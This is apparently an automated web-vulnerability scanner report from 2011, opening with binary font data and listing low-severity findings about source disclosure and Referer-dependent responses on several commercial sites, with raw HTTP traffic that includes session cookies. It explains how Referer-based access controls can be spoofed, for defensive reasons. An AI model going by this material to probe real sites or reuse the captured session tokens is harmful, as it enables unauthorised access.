foX.....-.....N.(1<{...C=+%z    Q25..q..T=...zl..E.......2a}..b..5y.I%.s..t..#....#.W....oZ{Vk....z.>..........'..qZ.q......Y......w.^.......i..A;...v.A.........%.v.......2.!.V..4..F.]...K...nbhcL-n7....C.......?...'I.C..*....>Y....J...O]{......:%.s.....Lx....m.$'GzC...PL.g0....}4..I../...6.Q...N...=...]...wn}~.?.`9...R4.?. W?...$.`......mp.,u@...._.n.q...qZp..N...F2......`.8..q.#.....;..w.`.8..q................y...c.."r....-?..h...+..c.....G..Cd.\x...i.vD}Y.V.+..!....._.I...!.......X...e..^.C.i.zH..T.    o.M...iN..c...E0.s.4...yk0........8h0........8h0......A.q..8h..j..7G..y*,......G..j.8./.2..P.4.E..X......i."b.`%l.[..."Z]...ya....i8'....A....;....!m..h.?........+;..|..9.U..1..........V..v.......{.g..<.[.C..9.ux.q...;./m.;...7.;.^P.n...f.M.jn$.R..."3;l>."3I..t^8I...=..\.X.l.$.h.....v.G...{..y1...=q_.....Uc.........=.`2.V\..!.J.G.. 2..'0d...........|.P.z/.Q.?...jDp..=d.^.+$...
.+f.BrF4..*.}.>..................y..:.^.....SS.*.R&..t.]..#.5..&r#......g...OJ.=..>].{u.-i..[.....t...F.. ZQ..n....X....E.10.....a.!...........;..7.VC.(>3j...nI...8`Amzl..dt    ...)9..AF..~.9
)..6,=i..4.......Z...tkq...dIS..........<w......y.o,>2...a.    3.7l...Nh..O..mx.Y...EH...*cR.ba..&.....e...t..,b.Q...C...YK..Z.......}...,I4B&|..~.LS..5_..:O g..{..x.....<..m.........LfL......BuIu.N..or.....1..r..d.s    ...\.../.T.........r..LY.;..HlF....m..#.ad......)....i..~.M...<|>ia...3.8Ql..2s.L.......x.....t.G..!kF..0.k.+.w.......\3t.....&.'.xv-..h6......%_z...)....W.EV..!.......?`...Pv,..jx{....Wb.J[.Vl.J......!_|..s.G..U....y.........^.d-K.P........*.............
...y..\...Q....fXF.>.]..&.XK?w-.\......Z..n.\H..\.~.......#.8by.rx1.gWb..a.,.x.mX.r.F..Hl..P.7..Hp....rK.i.3.;~....G...'.@.'...H
.-..R..q*.y._.]g.v=/.W..r..z.......C.....v}7../.<..m.[.k.{....y...
..n{n...zE.=.....V.M\.e...3b...
..+L.>y..i.v.0..x..>.yzZ=......Ub4j.?Ap....kT0p...k...g.X........`M..p....@.xxl..@...2..2.....Z..0........c!.a......5.'.l.5>.^.8.......O..4+.....5Y    ...n..#F&..S..h.xO.Q..{kC.Y9.....f.......{|%<.C.Qk.3..[a|...#.g..C.'GA..tY..E.g9.....1.....f...?.....    \Z.b~.m.....,.....a...~..r.cl....D..X......|....E..u R.m.G".G....*70.y..,,.?......x....3.....,....0A..^...=.A...W..u_...
...Z.+....W....k...9.,..vs....h..B..F.iG..8.Hu..b.%..G.......G.../.b..(...?>"2.l`.p.....Yi..].B......\
..&...........G>
...[SNIP]...

13.9. http://www.vasco.com/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.vasco.com
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: www.vasco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 21:24:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 25354

<? xml version=1.0" encoding=UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

14. Referer-dependent response previous next
There are 10 instances of this issue:

http://fast.fonts.com/d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff
https://idp.godaddy.com/login.aspx
http://seal.digicert.com/custsupport/sealtable.php
http://www.cheapssls.com/
http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
http://www.facebook.com/plugins/like.php
http://www.godaddy.com/shared/video/videos.aspx
http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc
http://www.register.com/unauthenticated_session_expired.rcmx

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

14.1. http://fast.fonts.com/d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://fast.fonts.com
Path:	/d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff

Request 1

GET /d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff?d44f19a684109620e4841671a590e81832a2f2b4cde668ef7c57a1fd767bd16f9ec936dc142b811b3cd269c7e1f5d7155b4d16b6e5a833e9be82349442efcc7c023a1b3449882811696e9e4d7d14b0686b45db496c5597d06da86f6e0d4d9674ea1e92691cd3fda37bf478a062d76903dd7361b5dbb3af30ff7546abe13edcead631c8f9b85dbef51462165276a0ed12129d1a1e282cf653ebff19e5505fe243809715a2a610071af40142db1aea1ad3fc2007899c3ffb33d442b4b3fb3462bb48c7d40d928b6305c1cf65b758a0594c5964b7aa5c698f2cc0079ca6d6d5579b4c6335e4ff8a21a1e6f4f4eada657ee53a8a308ecdc8af8525b21b5e100fdbe55d3e0fa2c24fdc6d05a0adbcf169be7313c3d6f3250dab3f05f8&projectId=ff15d4d3-b8d1-4d30-9c24-ac5254ba91fc HTTP/1.1
Host: fast.fonts.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Date: Sat, 03 Sep 2011 13:08:10 GMT
ETag: "3176241194"
Expires: Sat, 10 Sep 2011 13:08:10 GMT
Last-Modified: Tue, 26 Jul 2011 00:41:48 GMT
Server: ECS (sjo/5226)
X-Cache: HIT
Content-Length: 26032

wOFF......e........t........................OS/2...X...U...`Z...cmap.............C.Acvt ...L...E.....h.)fpgm.......+..    P....gasp................glyf......<...w.....head..C....6...6....hhea..D........$.c..hmtx..D<..........-Mkern..F,......0.-}6kloca..[H.........]..maxp..].... ... .v
qname..],.......>....post..c........ ...<prep..c........H..8Gx.c`f<.8.....i.S...C..f..`..........D.400.......3.Y.H.**1..w.....H=.#H...S....2.........x.c```d`.b.......@Z.A...a.e.c..h.....X.X.8..8.-.;
"
R
r
J
j
.
V
k.........Z.T....T].T}..ZXABAFA.............?.........[.c......{..|.....[..~......`w...{7.x.cj...........L.......... 5..Qt.C.DA1...YQ.)pqd..%!........o...Y......x..VOo.G..]'$$.].    8.....R6...v...Y.!q....v...a...8#UJO.M>D?.[NNO.8.=...zF\zBT U......'.j...7.....o;.........o......7..}y.....W>...'.W.]...|t........x...g.......S.............c.C9]c.Z    J..u`.!/...._~.T.6.MY..+..L
.-`.:L..    s...YGE.!W6^......Ce|.b+....)..x.....v}.....Y@.>.-......Sd...Oow... ....U....A.6#w...;b....I~....JX...i...f.......H..X......A.^B.._Aj......:..61.Qx..7iDM..x./\FR.]...~2>.J....L.,..Gd..<.~..oh.....Dg....I2.....v...b..S<.t..v.Y..zT1.R#...#..b....m....;].m.V>.Q.[.r-.HX....p.....^.o.....Z(y.k...$..*...Cx...R.h.."...?4.p......&Pl...<.{.MA.8~(..4w.k..EPB.cO.mx.....T.iS.....8.-.[....Z;..7c.......j*.,.Q.!.;-r...x..ruG...*.N.^R..gwP{....;...G"W>.k.0c.b.{db+B.S..q`?...4.....>..r.7:.j.A..:..'......Ea..p...1.8R.).0B.....U..r.=...e..D..........<.Q}M..i..{K.L.X.g.E3yu....tM..8.IQ..........q.....P.....q.Cm'.#lk.0.To..:...Pzj..J..Mi..,.=..cg}...uO}.....<N$.j4^.8.8.6.)Zr..>..jV-..kx8.N..eos-..VcV04......&..v.a............S.0w!q.z..;...q....\..k.Q........ZQ.W.6..&....v.......Q:..5f
...[SNIP]...

Request 2

GET /d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff?d44f19a684109620e4841671a590e81832a2f2b4cde668ef7c57a1fd767bd16f9ec936dc142b811b3cd269c7e1f5d7155b4d16b6e5a833e9be82349442efcc7c023a1b3449882811696e9e4d7d14b0686b45db496c5597d06da86f6e0d4d9674ea1e92691cd3fda37bf478a062d76903dd7361b5dbb3af30ff7546abe13edcead631c8f9b85dbef51462165276a0ed12129d1a1e282cf653ebff19e5505fe243809715a2a610071af40142db1aea1ad3fc2007899c3ffb33d442b4b3fb3462bb48c7d40d928b6305c1cf65b758a0594c5964b7aa5c698f2cc0079ca6d6d5579b4c6335e4ff8a21a1e6f4f4eada657ee53a8a308ecdc8af8525b21b5e100fdbe55d3e0fa2c24fdc6d05a0adbcf169be7313c3d6f3250dab3f05f8&projectId=ff15d4d3-b8d1-4d30-9c24-ac5254ba91fc HTTP/1.1
Host: fast.fonts.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Access-Control-Allow-Origin: *
Cache-Control: max-age=604800
Content-Type: text/html
Date: Sat, 03 Sep 2011 13:08:16 GMT
Expires: Sat, 10 Sep 2011 13:08:16 GMT
Server: ECS (sjo/5226)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>

14.2. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://idp.godaddy.com
Path:	/login.aspx

Request 1

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:26:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:13 GMT; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...
<img alt="" src='https://img.godaddy.com/image.aspx?status=200&plid=1&shopperid=&querystring=SPKey%3dGDMYA-M1PWMYAWEB006%26redirect%3dfalse%26myaurl%3d%252fproducts%252faccountlist.aspx&referrer=https%253a%252f%252fidp.godaddy.com%252flogin.aspx%253fci%253d9106%2526spkey%253dGDSWNET-M1PWCORPWEB109%2526target%253dhttp%253a%252f%252fwww.godaddy.com%252fssl%252fssl-certificates.aspx&site=idp.godaddy.com&server=SSOWEB09&isc=&page=%2flogin.aspx&nocache=9/3/2011 5:26:13 PM' /></div>
<link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" />

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
<script type="text/javascript">
var pcj_pl_id = "1";
var pcj_url_help = "http://help.godaddy.com/";
var pcj_url_bp = "https://www.bobparsons.me/";
var pcj_args = "?ci=";
var pcj_url_cmnty= "http://community.godaddy.com/";
var pcj_url_mya="https://mya.godaddy.com/";
var pcj_url_sales = "https://www.godaddy.com/";
var pcj_url_img = "https://img1.wsimg.com/";
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_cname = "ShopperId1";
var pcj_cdomain = ".godaddy.com";
var pcj_callov = false;
var pcj_call = true;
var pct_loginnameDone = false;
var pct_loginnameField;
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB006";
var pcj_navnm = "mya";

$pc(document).ready(function () {

var flgPopDiv = document.getElementById("pct_flg_pop");
pcj_intl(flgPopDiv, pcj_url_sales, pcj_args + "13559");
pcj_setFlag(pcj_pl_id, $pc("#pct_flg_img"), $pc("#pct_flg_crncy"));

var cartDiv = document.getElementById("pct_cart");
pcj_cart(cartDiv, pcj_url_sales, pcj_args + "13561");

pct_loginnameField = document.getElementById("loginname");
if (pct_loginnameField && window.pcj_passwatch) { pct_loginnameField.onclick = pcj_passwatch; }

if ($pc(this).doCall()) {
pcj_callext("pcj_setdata", pcj_url_sales + "external/json/PcSetData.aspx" + pcj_args + "17368&callback=pcj_setdata");
}

pcj_action_domain = "https://www.godaddy.com/domains/searc
...[SNIP]...

Request 2

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:26:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:31 GMT; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Set-Cookie: traffic=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...
<img alt="" src='https://img.godaddy.com/image.aspx?status=200&plid=1&shopperid=&querystring=SPKey%3dGDMYA-M1PWMYAWEB006%26redirect%3dfalse%26myaurl%3d%252fproducts%252faccountlist.aspx&referrer=&site=idp.godaddy.com&server=SSOWEB09&isc=&page=%2flogin.aspx&nocache=9/3/2011 5:26:31 PM' /></div>
<link rel="shortcut icon" type="image/x-ico" href="https://imagesak.securepaynet.net/sso/gd/imgs/favicon.ico" />

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"></script>
<script type="text/javascript">
var pcj_pl_id = "1";
var pcj_url_help = "http://help.godaddy.com/";
var pcj_url_bp = "https://www.bobparsons.me/";
var pcj_args = "?ci=";
var pcj_url_cmnty= "http://community.godaddy.com/";
var pcj_url_mya="https://mya.godaddy.com/";
var pcj_url_sales = "https://www.godaddy.com/";
var pcj_url_img = "https://img1.wsimg.com/";
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_cname = "ShopperId1";
var pcj_cdomain = ".godaddy.com";
var pcj_callov = false;
var pcj_call = true;
var pct_loginnameDone = false;
var pct_loginnameField;
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB006";
var pcj_navnm = "mya";

$pc(document).ready(function () {

var flgPopDiv = document.getElementById("pct_flg_pop");
pcj_intl(flgPopDiv, pcj_url_sales, pcj_args + "13559");
pcj_setFlag(pcj_pl_id, $pc("#pct_flg_img"), $pc("#pct_flg_crncy"));

var cartDiv = document.getElementById("pct_cart");
pcj_cart(cartDiv, pcj_url_sales, pcj_args + "13561");

pct_loginnameField = document.getElementById("loginname");
if (pct_loginnameField && window.pcj_passwatch) { pct_loginnameField.onclick = pcj_passwatch; }

if ($pc(this).doCall()) {
pcj_callext("pcj_setdata", pcj_url_sales + "external/json/PcSetData.aspx" + pcj_args + "17368&callback=pcj_setdata");
}

pcj_action_domain = "https://www.godaddy.com/domains/search.aspx?ci=8962&checkAvail=1";
pcj_action_who = "https://who.godaddy.com/whoischeck.aspx?ci=12659";
pcj_action_auction = "https://auctions.godaddy.com/trphome.aspx?ci=12658&t=16";

...[SNIP]...

14.3. http://seal.digicert.com/custsupport/sealtable.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://seal.digicert.com
Path:	/custsupport/sealtable.php

Request 1

GET /custsupport/sealtable.php?order_id=00182007&seal_type=a&seal_size=large&seal_color=green HTTP/1.1
Host: seal.digicert.com
Proxy-Connection: keep-alive
Referer: http://www.digicert.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:30:13 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Thu, 14 Jul 2011 01:19:42 GMT
Cache-Control: max-age=604800
P3P: CP="ALL DSP COR CUR DEV PSA CONi OUR BUS PHY ONL PUR COM STA", policyref="http://www.digicert.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 6855

function getDocType() { //May not work with IE 8 and lower
   for (x = 0; x < document.childNodes.length; x++) {
       if (parseInt(document.childNodes[x].nodeType) == 10) {
           return document.childNodes
...[SNIP]...
;
   var ww=screen.width;
   var hh=screen.height;
   var left=(ww - width) / 2;
   var top=(hh - height) / 2;
   window.open('https://www.digicert.com/custsupport/sspopup.php?order_id=' + num + '&hostname=http%3A%2F%2Fwww.digicert.com','oo',"dependent=1,height="+height+",width="+width+",left="+left+",top="+top+",location=0,menubar=0,resizable=1,scrollbars=yes,status=0,toolbar=0");
   return false;
}

coderzDone=false;
function coderz()
{
       writeEndingCode();
   if(document.getElementById("digicertsitesealcode2large"))
   {
       var x=document.getElementById('digicertsitesealcode2large');
       x.style.display='block';
       x.style.lineHeight='10px';
       x.style.background='transparent';
       x.style.fontSize='9px';
       x.style.fontWeight='normal';
       x.style.fontFamily="Arial, sans-serif";
       x.style.fontWeight='normal';
       x.style.textAlign='center';
       x.style.textTransform='uppercase';
       x.style.color='#423C42';
       var z=document.getElementById("digicertsitesealcode2large").getElementsByTagName("A");
       for (var i=0; i < z.length; i++)
       {
           z[i].target='_blank';
           z[i].style.padding='0';
           z[i].style.margin='0';
           if(_u.IE)
           {
               // Nothing
           }
           else
           {
               z[i].style.background='transparent';
           }
           z[i].style.display='inline';
           z[i].style.width='auto';
           z[i].style.fontSize='9px';
           z[i].style.fontWeight='normal';
           z[i].style.fontFamily="Arial, sans-serif";
           z[i].style.color='#423C42';
           z[i].style.textDecoration='none';
           z[i].style.textTransform='uppercase';
                       z[i].style.textAlign='center';
           z[i].onmouseover=function()
           {
               window.status='';
               return true;
           }
           var q=z[i].getElementsByTagName("IMG");
           for(var j=0; j<q.length; j++)
           {
               q[j].style.backgroundColor='transparent';
               q[j].style.margin='0';
               q[j].style.padding='0';
           }
       }
       var q=document.getElementById('digisealvaliddatelarge');
       if(q)
       {
           q.style.display='block';
           q.style.position='absolute';
           q.style.fontSize='9px';
           q.style.fontFamily="Arial, sans-serif";
           if(_u.IE8t)
           {
               if(_u.doctype == 'trans')
               {
                   q.style.top='-28px';
               }
               else
               {
                   q.style.top='-19px';
               }

...[SNIP]...

Request 2

GET /custsupport/sealtable.php?order_id=00182007&seal_type=a&seal_size=large&seal_color=green HTTP/1.1
Host: seal.digicert.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:30:34 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Thu, 14 Jul 2011 01:19:42 GMT
Cache-Control: max-age=604800
P3P: CP="ALL DSP COR CUR DEV PSA CONi OUR BUS PHY ONL PUR COM STA", policyref="http://www.digicert.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 6815

function getDocType() { //May not work with IE 8 and lower
   for (x = 0; x < document.childNodes.length; x++) {
       if (parseInt(document.childNodes[x].nodeType) == 10) {
           return document.childNodes
...[SNIP]...
;
   var ww=screen.width;
   var hh=screen.height;
   var left=(ww - width) / 2;
   var top=(hh - height) / 2;
   window.open('https://www.digicert.com/custsupport/sspopup.php?order_id=' + num + '&hostname=%3A%2F%2F','oo',"dependent=1,height="+height+",width="+width+",left="+left+",top="+top+",location=0,menubar=0,resizable=1,scrollbars=yes,status=0,toolbar=0");
   return false;
}

coderzDone=false;
function coderz()
{
       writeEndingCode();
   if(document.getElementById("digicertsitesealcode2large"))
   {
       var x=document.getElementById('digicertsitesealcode2large');
       x.style.display='block';
       x.style.lineHeight='10px';
       x.style.background='transparent';
       x.style.fontSize='9px';
       x.style.fontWeight='normal';
       x.style.fontFamily="Arial, sans-serif";
       x.style.fontWeight='normal';
       x.style.textAlign='center';
       x.style.textTransform='uppercase';
       x.style.color='#423C42';
       var z=document.getElementById("digicertsitesealcode2large").getElementsByTagName("A");
       for (var i=0; i < z.length; i++)
       {
           z[i].target='_blank';
           z[i].style.padding='0';
           z[i].style.margin='0';
           if(_u.IE)
           {
               // Nothing
           }
           else
           {
               z[i].style.background='transparent';
           }
           z[i].style.display='inline';
           z[i].style.width='auto';
           z[i].style.fontSize='9px';
           z[i].style.fontWeight='normal';
           z[i].style.fontFamily="Arial, sans-serif";
           z[i].style.color='#423C42';
           z[i].style.textDecoration='none';
           z[i].style.textTransform='uppercase';
                       z[i].style.textAlign='center';
           z[i].onmouseover=function()
           {
               window.status='';
               return true;
           }
           var q=z[i].getElementsByTagName("IMG");
           for(var j=0; j<q.length; j++)
           {
               q[j].style.backgroundColor='transparent';
               q[j].style.margin='0';
               q[j].style.padding='0';
           }
       }
       var q=document.getElementById('digisealvaliddatelarge');
       if(q)
       {
           q.style.display='block';
           q.style.position='absolute';
           q.style.fontSize='9px';
           q.style.fontFamily="Arial, sans-serif";
           if(_u.IE8t)
           {
               if(_u.doctype == 'trans')
               {
                   q.style.top='-28px';
               }
               else
               {
                   q.style.top='-19px';
               }
               q.style.zIndex='
...[SNIP]...

14.4. http://www.cheapssls.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/

Request 1

GET /?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A4%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A4%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A4; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.12.9.1315085480977; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:41:12 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:41:12 GMT
Content-Length: 29492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Advanced s
...[SNIP]...
%26x%3D0%26y%3D0%26dispatch%3Dproducts.search&ve%5Btitle%5D=Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big+-+Advanced+search+%3A%3A+Search+results&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btime_begin%5D=1315086072.0464" width="0" height="0"></object>
</noscript>
<script type="text/javascript">
//<![CDATA[
   var _gaq = _gaq || [];
   _gaq.push(["_setAccount", "UA-20441656-1"]);
   _gaq.push(["_trackPageview"]);

   (function() {
       var ga = document.createElement("script");
       ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";
       ga.setAttribute("async", "true");
